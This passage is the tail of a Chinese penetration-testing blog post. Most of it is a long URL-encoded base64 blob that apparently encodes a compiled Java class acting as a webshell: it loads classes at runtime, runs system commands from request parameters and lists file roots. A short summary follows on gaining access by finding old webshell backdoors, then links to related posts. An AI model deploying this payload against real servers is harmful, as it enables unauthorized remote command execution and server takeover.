BqYXZhL2xhbmcvT2JqZWN0BwEzDAE0ATUBAAtnZXRSZXNwb25zZQwBNgE3BwE4DAE5AToMATsBPAwAqgCrAQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQALZGVmaW5lQ2xhc3MHAT0MAT4AowwBPwFADAFBAUIBABBqYXZhL2xhbmcvU3RyaW5nDAFDAUQHAUUMAUYBRwwBSAFJDAFKAUsMAHIAcwwAawFMAQAMamF2YS52ZXJzaW9uBwFNDAFOAJgBAAMxLjkMAU8BSQEAEGphdmEudXRpbC5CYXNlNjQBAApnZXREZWNvZGVyDAFQATIBABZzdW4ubWlzYy5CQVNFNjREZWNvZGVyAQAMZGVjb2RlQnVmZmVyDAFGAVEBAA1jb20vdGVzdC9JbmZvAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9pby9JT0V4Y2VwdGlvbgEADnNldENvbnRlbnRUeXBlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAUc2V0Q2hhcmFjdGVyRW5jb2RpbmcBAAxnZXRQYXJhbWV0ZXIBAAZhcHBlbmQBACwoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVmZmVyOwEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwEACHRvU3RyaW5nAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAFcHJpbnQBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEAEyhMamF2YS9pby9SZWFkZXI7KVYBAAhyZWFkTGluZQEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoBAAxqYXZhL2lvL0ZpbGUBAAlsaXN0Um9vdHMBABEoKVtMamF2YS9pby9GaWxlOwEANShMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTtJSSlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAHaXNBcnJheQEAAygpWgEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEWphdmEvbGFuZy9JbnRlZ2VyAQAEVFlQRQEADmdldENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7AQAOZ2V0Q29uc3RydWN0b3IBADMoW0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjsBAB1qYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcgEAC25ld0luc3RhbmNlAQAnKFtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAIcGFyc2VJbnQBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkBAAlzdWJzdHJpbmcBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEACWNvbXBhcmVUbwEACWdldE1ldGhvZAEAFCgpTGphdmEvbGFuZy9PYmplY3Q7ACEAYQA%2BAAAABgABAGIAYwAAAAEAZABlAAAAAQBmAGcAAAABAGgAZwAAAAEAaQBnAAAAAQBqAGcAAAAIAAEAawBsAAEAbQAAAGMAAgABAAAAISq3AAEqAbUAAioBtQADKhIEtQAFKhIGtQAHKhIItQAJsQAAAAIAbgAAAB4ABwAAABEABAAKAAkACwAOAAwAFAANABoADgAgABIAbwAAAAwAAQAAACEAcABxAAAAAQByAHMAAQBtAAABiwAEAAcAAACrKiu2AAq7AAtZtwAMTRINThIOOgQSDzoFKrQAAxIQuQARAgAqtAACKrQAB7kAEgIAKrQAAyq0AAe5ABMCACoqKrQAAhkFuQAUAgC2ABW1ABYsKrYAF7YAGFenACE6Biy7ABpZtwAbEhy2AB0ZBrYAHrYAHbYAH7YAGFcqtAADuQAgAQC7ABpZtwAbLbYAHSostgAhtgAitgAdGQS2AB22AB%2B2ACOnAAU6BgSsAAIAGABZAFwAGQB6AKQApwAZAAMAbgAAAEYAEQAAABUABQAWAA0AFwAQABgAFAAZABgAHAAjAB0AMAAeAD0AHwBQACAAWQAjAFwAIQBeACIAegAmAKQAKACnACcAqQAqAG8AAABIAAcAXgAcAHQAdQAGAAAAqwBwAHEAAAAAAKsAdgB3AAEADQCeAHgAeQACABAAmwB6AGcAAwAUAJcAewBnAAQAGACTAHwAZwAFAH0AAAAkAAT%2FAFwABgcAfgcAfwcAgAcAgQcAgQcAgQABBwCCHWwHAIIBAAAAgwCEAAIAbQAAAQ8AAwAHAAAAZLgAJBIltgAmTCu2ACdNuwAaWbcAG04BOgS7AChZLLcAKToFuwAqWRkFtwArOgYZBrYALFk6BMYAEi0ZBLYAHRIttgAdV6f%2F6bsAGlm3ABsSLrYAHS22AB%2B2AB0SLrYAHbYAH7AAAAADAG4AAAAmAAkAAAAzAAkANAAOADUAFgA2ABkANwAjADgALgA5ADkAOgBIADwAbwAAAEgABwAAAGQAcABxAAAACQBbAIUAhgABAA4AVgCHAIgAAgAWAE4AiQCKAAMAGQBLAIsAZwAEACMAQQCMAI0ABQAuADYAjgCPAAYAfQAAAB8AAv8ALgAHBwB%2BBwCQBwCRBwCSBwCBBwCTBwCUAAAZAJUAAAAEAAEAlgAAAJcAmAABAG0AAAFJAAQACAAAAFm7ABpZtwAbTSsSL7YAMJoAP7gAMU4tOgQtvjYFAzYGFQYVBaIAHBkEFQYyOgcsGQe2ADIDBbYAM1eEBgGn%2F%2BOnABVOLBIvtgAdV6cACiwSL7YAHVcstgAfsAABABEAPwBCABkAAwBuAAAAPgAPAAAAQAAIAEEAEQBDABUARAAYAEUAHABHACYASAAtAEkAOQBHAD8ATQBCAEsAQwBMAEoATQBNAE8AVABSAG8AAABcAAkALQAMAJkAmgAHAB8AIACbAJwABgAVACoAegCdAAMAGAAnAHsAnQAEABwAIwB8AJwABQBDAAcAdAB1AAMAAABZAHAAcQAAAAAAWQB2AGcAAQAIAFEAeACKAAIAfQAAADAABf8AHwAHBwB%2BBwCBBwCSBwCeBwCeAQEAAP8AHwADBwB%2BBwCBBwCSAABCBwCCCgYAAQCfAKAAAQBtAAACBgAEAAYAAADfK7YANLYANZkAJSvAADbAADbAADZNKiwDMsAAN7UAAiosBDLAADi1AAOnALUSObgAOk0qLBI7A70APLYAPSsDvQA%2BtgA%2FwAA3tQACKiwSQAO9ADy2AD0rA70APrYAP8AAOLUAA6cAek0rwQA3mQByKivAADe1AAIqtAACtgA0EkG2AEJOLQS2AEMtKrQAArYARMAANzoEGQS2ADQSRbYAQjoFGQUEtgBDKhkFGQS2AETAADi1AAOnAChOKiq0AAK2ADQSQAO9ADy2AD0rA70APrYAP8AAOLUAA6cABToEsQADACwAZABnABkAdwC2ALkAGQC6ANkA3AAZAAMAbgAAAGIAGAAAAFYACgBXABUAWAAfAFkAKQBaACwAXAAyAF0ASwBeAGQAcQBnAF8AaABgAG8AYQB3AGQAhABlAIkAZgCWAGcAogBoAKgAaQC2AG8AuQBqALoAbADZAG4A3ABtAN4AdABvAAAAXAAJABUAFAB4AKEAAgAyADIAogCjAAIAhAAyAHoApAADAJYAIAB7AGMABACiABQAfACkAAUAugAkAJkAdQADAGgAdgB0AHUAAgAAAN8AcABxAAAAAADfAHYAdwABAH0AAAAzAAUsegcAgv8AUQADBwB%2BBwB%2FBwCCAAEHAIL%2FACIABAcAfgcAfwcAggcAggABBwCC%2BQABAAEApQCYAAEAbQAAAPwABgAFAAAAcioqtAAWtgBGTRJHEkgGvQA8WQMSSVNZBLIASlNZBbIASlO2AD1OLQS2AEstKrYANLYATAa9AD5ZAyxTWQQDuABNU1kFLL64AE1TtgA%2FwAA8OgQZBAS9ADxZAxJOU7YATwS9AD5ZAytTtgBQtgBRsE0rsAABAAAAbgBvABkAAwBuAAAAHgAHAAAAeAAJAHkAJgB6ACsAewBSAHwAbwB9AHAAfgBvAAAAPgAGAAkAZgB4AKYAAgAmAEkAegCnAAMAUgAdAHsAowAEAHAAAgB8AHUAAgAAAHIAcABxAAAAAAByAHYAZwABAH0AAAAIAAH3AG8HAIIAAACoAJgAAgBtAAAAyAAEAAQAAAA3Az0qtAAJuABSPisdtgBTTKcABk4DPSq0AAUSBLYAVJkAFrsATlkqK7YARiq0AAe3AFWnAAQrsAABAAIAEAATABkAAwBuAAAAHgAHAAAAgwACAIYACgCHABAAigATAIgAFACJABYAjABvAAAANAAFAAoABgB8AJwAAwAUAAIAewB1AAMAAAA3AHAAcQAAAAAANwB2AGcAAQACADUAeACpAAIAfQAAABkABP8AEwADBwB%2BBwCBAQABBwCCAh5ABwCBAJUAAAAEAAEAGQABAKoAqwABAG0AAAF%2BAAYABwAAAJYBTRJWuABXTi0SWLYAWZsATRJauAA6OgQZBBJbA70APLYAXAEDvQA%2BtgA%2FOgYZBrYANBJdBL0APFkDEk5TtgBcGQYEvQA%2BWQMrU7YAP8AAScAAScAASToFpwA1El64ADo6BBkEEl8EvQA8WQMSTlO2AFwZBLYAYAS9AD5ZAytTtgA%2FwABJwABJwABJOgUZBbA6BAO8CLAAAQAIAI8AkAAZAAMAbgAAADIADAAAAJAAAgCRAAgAlgARAJcAGACYAC0AmQBYAJoAWwCbAGIAnACNAJ8AkACgAJIAoQBvAAAAZgAKAC0AKwB8AHcABgAYAEMAewCjAAQAWAADAJkApgAFAGIALgB7AKMABACNAAMAmQCmAAUAkgAEAJsAdQAEAAAAlgBwAHEAAAAAAJYAdgBnAAEAAgCUAHgAdwACAAgAjgB6AGcAAwB9AAAAKgAD%2FQBbBwB%2FBwCB%2FQAxBwCsBwBJ%2FwACAAQHAH4HAIEHAH8HAIEAAQcAggABAK0AAAACAK4%3D

image

最后就告诉弟弟,成功rce了。

image

总结

权限获取不一定非要通过端口弱口令RCE文件上传注入钓鱼等漏洞去获取。也可以通过信息搜集找到历史的webshell后门去获取权限。

不过此方法获取权限成本较高,不推荐,只能作为思路。


粤海杯部分题Writeup

粤海杯writeup

Read more
记一次项目中的任意用户登录

记录在华为和移动项目中挖到的一个任意用户登录漏洞,该漏洞绕过了密码和验证码登录策略,只需要知道用户名即可登录后台。

Read more
渗透测试过程中,加解密的应用

记录项目中,开发将参数全部加密了。通过分析js前端算法,编写加解密脚本,并成功再次利用越权和SQL注入漏洞。

Read more
2021年度总结

总结学习学习安全这段时间来的心路体会。

Read more
从任意文件下载到命令执行

windows环境下通过fuzz方式获取源码,并最终拿下服务器system权限。

Read more
易思ESPCMS(P8.21012001稳定版)代码审计

php代码审计

Read more